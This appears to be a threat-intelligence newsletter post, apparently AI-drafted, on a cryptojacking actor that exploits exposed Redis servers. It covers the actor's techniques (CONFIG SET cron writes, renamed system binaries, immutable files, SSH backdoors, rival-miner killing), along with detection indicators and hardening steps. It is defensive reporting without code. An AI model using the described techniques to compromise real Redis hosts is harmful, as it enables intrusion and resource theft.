ta-natalstatus

TA-NATALSTATUS: Rootkit-Style Cryptojacking Dominates Exposed Redis Servers Globally

If Redis is open to the internet, assume compromise. This actor gains root with native Redis tricks, plants miners, and hides using “rootkit-style” evasion. Here’s how to spot it fast and close the hole for good.

Wes

Wes

15 min read
TA-NATALSTATUS: Rootkit-Style Cryptojacking Dominates Exposed Redis Servers Globally
TA-NATALSTATUS Facilities: Free power, free cooling—bring your own ‘immutable.’

TL;DR

  • Lock down Redis now: require auth, bind to localhost/VPC, and segment networks.

  • Hunt for stealth: detect renamed system tools (ps, top, curl, wget), immutable files, and rogue cron jobs.

  • Kill persistence: remove miners, backdoors, and file immutability; rebuild binaries from known-good sources.

  • Monitor resources: alert on sudden CPU spikes, outbound mining pools, and process cloaking.

  • Instrument evidence: collect Redis command logs and host artifacts before remediation to preserve attribution.

(Have feedback? Did something resonate with you? Did something annoy you? Just hit reply! :))

Tired of writing intellingence reports? Not sure if you should trust your AI generated report?

  • write a report on ‘TA-NATALSTATUS Cryptojacking Campaign’

Does it take a chunks out of your day? Would you like help with the research?

This baseline report was thoughtfully researched and took 10 minutes.. It's meant to be a rough draft for you to enhance with the unique insights that make you an invaluable analyst.

We just did the initial grunt work..

Are you ready to level up your skillset? Get Started Here!

Did this help you? Forward it to a friend!

Why it matters

SOC

  • Unusual Redis commands on port 6379 from external IPs (e.g., CONFIG SET, SLAVEOF, MODULE LOAD).
  • Host with high CPU for kworker/unknown processes and no matching ps/top entries.
  • Outbound to mining pools (Stratum protocol on 3333/4444/5555) or DNS lookups for pool domains.

IR

  • Triage for tampered binaries (/bin/ps, /usr/bin/top) and immutable flags (chattr +i).
  • Preserve /etc/crontab, /var/spool/cron/*, SSH keys, /tmp droppers, Redis logs, and network PCAPs.
  • Snapshot process tree, loaded kernel modules, and hash any “replaced” utilities from rescue media.

SecOps

  • Enforce Redis hardening: requirepass, bind 127.0.0.1, protected-mode yes, security groups/ACLs.
  • Deploy EDR (endpoint detection and response) with file-integrity monitoring on system utilities.
  • Block egress to known mining pools; apply least-privilege IAM on cloud nodes/images.

Strategic

  • Treat exposed Redis as a business risk: downtime, cloud spend blowouts, and IR cost.
  • Add cryptojacking KPIs to cyber metrics (time-to-contain, extra cloud cost avoided).
  • Require quarterly scans for internet-exposed services and misconfiguration audits.

Jargon quick defs:
cryptojacking = hijacking compute to mine cryptocurrency;
TTPs = tactics/techniques/procedures;
“rootkit-style binary hijacking” = replacing/renaming system tools to hide;
immutable file lock = chattr +i preventing edits.

The story in 60 seconds

Who/what/why: TA-NATALSTATUS is abusing unauthenticated or poorly configured Redis to gain root and mine crypto at scale. Activity is sustained in 2025 and confirmed through Aug 25, 2025, with high exposure in Finland, Russia, Germany, and the US.

How (TTPs): The actor uses native Redis commands to drop payloads, set persistence via cron, and add SSH backdoors. They rename common admin tools (ps, top, curl, wget) to blind operators, toggle immutable flags on their files, and run scanners (masscan, pnscan) for spread/lateral recon. They also kill rival miners (e.g., Kinsing) to monopolize hardware.

Impact: Cloud/critical infrastructure and tech/manufacturing/media see the worst cost and disruption. Misconfigurations + weak egress controls = long dwell time and bloated cloud bills.

See it in your telemetry

  • Mail: N/A (campaign is infrastructure-driven, not phish-first).

  • Endpoint (Linux):

    • Hash/size mismatch for /bin/ps, /usr/bin/top; binaries with recent unexpected mtime.
    • crontab -l shows unknown entries; /etc/rc.local or systemd services calling miners.
    • Files or dirs with immutable attribute (lsattr) tied to miner paths in /tmp, /var/tmp, /opt.

  • Network:

    • External access to Redis :6379 from the internet; CONFIG, SLAVEOF, or module load attempts.
    • Egress to Stratum pools, persistent TCP to unknown hosts on 3333/4444/5555; DNS for pool.*.
    • Lateral scanning bursts: masscan/pnscan signatures and SYN floods to common service ports.

  • Redis:

    • redis-cli MONITOR/audit logs show unauthorized CONFIG SET, key writes from unknown IPs.
    • Unexpected dir/dbfilename changes pointing to writable system paths.

  • Cloud:

    • Sudden CPU credit depletion (burstable types), cost spikes, or autoscaling anomalies on Redis hosts.
    • Instances with public IPs lacking SG/NSG restrictions; missing private endpoints/VPC peering.

High Impact, Quick Wins

  • Close the front door (now): Restrict Redis to localhost/VPC and require auth; verify with nmap from outside. Sell it: stops active theft today. Measure: exposed-to-internet count → 0; failed external connects logged.

  • Restore system truth: Replace tampered utilities from gold images, remove chattr +i, nuke rogue cron/systemd entries, and redeploy from clean AMIs. Sell it: removes attacker invisibility. Measure: file-integrity baseline clean, no anomalous CPU over 72 hours.

  • Choke egress: Block mining pools and Stratum at firewall/proxy; alert on future attempts. Sell it: hard dollar savings on cloud bills. Measure: outbound pool connections → 0; monthly compute spend variance back to baseline.

Suggested Pivots

  1. Which specific persistence and ... (SUBSCRIBE TO UNLOCK!) ..., and how can endpoint detection and response (EDR), security information and event management (SIEM), and file integrity monitoring systems be optimized to detect these behaviors in real time?

  2. Given the high exposure rates of (SUBSCRIBE TO UNLOCK!) ..., how can threat intelligence and vulnerability management programs prioritize defensive measures across these geographic regions and critical sectors (cloud infrastructure, critical infrastructure, technology, manufacturing, media) to reduce the attack surface exploited by TA-NATALSTATUS?

  3. How does TA-NATALSTATUS’s aggressive elimination of rival (SUBSCRIBE TO UNLOCK!) ..., and what opportunities exist for leveraging this behavior to identify and disrupt competing malware campaigns during incident response and threat hunting operations?

CTA Image

Ready to level up your intelligence game?

Sign Up!

Executive Summary

TA-NATALSTATUS is a highly disciplined cryptojacking threat actor exploiting exposed Redis servers worldwide, with a significant escalation observed in 2025. The group uses legitimate Redis commands to gain root access, install miners, and establish persistence through malicious cron jobs, immutable file locks, and SSH backdoors. Advanced evasion techniques include rootkit-style binary hijacking (renaming ps, top, curl, wget), process cloaking, and command obfuscation, enabling the campaign to evade traditional detection and maintain long-term control.

The actor systematically scans for unauthenticated Redis instances (port 6379), disables security controls (SELinux, firewalls), and deploys network scanning tools (masscan, pnscan) for lateral movement. TA-NATALSTATUS actively terminates rival cryptojacking malware (e.g., Kinsing) to monopolize system resources, further complicating detection and remediation.

The campaign disproportionately impacts cloud infrastructure, critical infrastructure, technology, manufacturing, and media sectors, with exposure rates exceeding 30% in several major economies. No direct links to other APT groups have been identified, but the TTPs reflect a mature, evolving threat model.

Mitigation requires immediate hardening of Redis configurations (authentication, localhost binding, network segmentation), deployment of file integrity monitoring and EDR solutions, and regular security audits. Organizations should monitor for indicators such as renamed system binaries, unauthorized cron jobs, and immutable files, and develop incident response playbooks tailored to persistent cryptojacking threats. Continuous staff training and threat intelligence sharing are essential to address the systemic security gap and reduce dwell time.

The campaign’s evolution, aggressive anti-rival tactics, and global reach signal a sustained, high-impact threat to cloud and critical infrastructure, necessitating urgent, coordinated defensive action.

Research & Attribution

Historical Context

TA-NATALSTATUS is an advanced cryptojacking campaign active since 2020, escalating globally in 2025. It targets exposed Redis servers worldwide, exploiting misconfigurations to gain root access and install cryptocurrency miners. Unlike typical cryptojacking operations, TA-NATALSTATUS employs stealth, persistence, and resilience techniques such as rootkit-style binary hijacking, process cloaking, command obfuscation, and immutable file locks. The campaign aggressively eliminates rival malware to monopolize compromised systems. This reflects a systemic failure to secure Redis instances globally, creating a vast attack surface for automated exploitation.

Timeline

  • 2020: Initial related cryptojacking campaigns involving exposed Redis instances reported by Trend Micro.
  • 2020–2025: TA-NATALSTATUS evolved its tactics, techniques, and procedures (TTPs), adding stealth and persistence features.
  • 2025: The campaign escalated globally, actively targeting Redis servers in the US, Europe, Russia, India, and other regions.

Origin

TA-NATALSTATUS is a threat actor or group specializing in cryptojacking via exploitation of misconfigured Redis servers. The actor uses legitimate Redis commands to gain root privileges by exploiting Redis instances running as root, enabling direct manipulation of system cron jobs for persistence. The campaign is identified and tracked primarily by CloudSEK, with its TTPs showing evolution from earlier multiplatform worms reported by Trend Micro.

Countries Targeted

  1. United States - Over 17% of Redis servers exposed.
  2. Germany - Approximately 33% of Redis servers exposed.
  3. United Kingdom - Around 27% of Redis servers exposed.
  4. Finland - About 41% of Redis servers exposed.
  5. Russia - Approximately 39% of Redis servers exposed.

Sectors Targeted

  1. Cloud Infrastructure - Exploitation of Redis servers for cryptojacking.
  2. Critical Infrastructure - Indirectly impacted due to reliance on cloud services.
  3. Technology - Targeted through compromised cloud and network infrastructure.
  4. Manufacturing - Affected by related malware campaigns.
  5. Media and Communications - Also targeted by associated malware.

Motivation

Financial gain through stealthy, persistent cryptocurrency mining. The actor aims to maintain long-term control over compromised servers to maximize mining revenue while evading detection and eliminating competing malware.

Attack Types

  • Scanning for unauthenticated Redis servers on port 6379.
  • Using legitimate Redis commands (CONFIG SET, SAVE) to write malicious cron jobs.
  • Disabling security features like SELinux and firewalls.
  • Hijacking system binaries (e.g., renaming ps and top) to hide mining processes.
  • Renaming download tools (curl and wget) to evade detection.
  • Installing scanning tools (masscan, pnscan) for lateral movement.
  • Establishing persistence via immutable files (chattr +i) and SSH backdoors.
  • Executing a "kill list" to terminate rival cryptojacking malware.

Recommendations, Actions, Suggested Pivots, Forecasts and Next Steps

(Subscribers Only)

Read more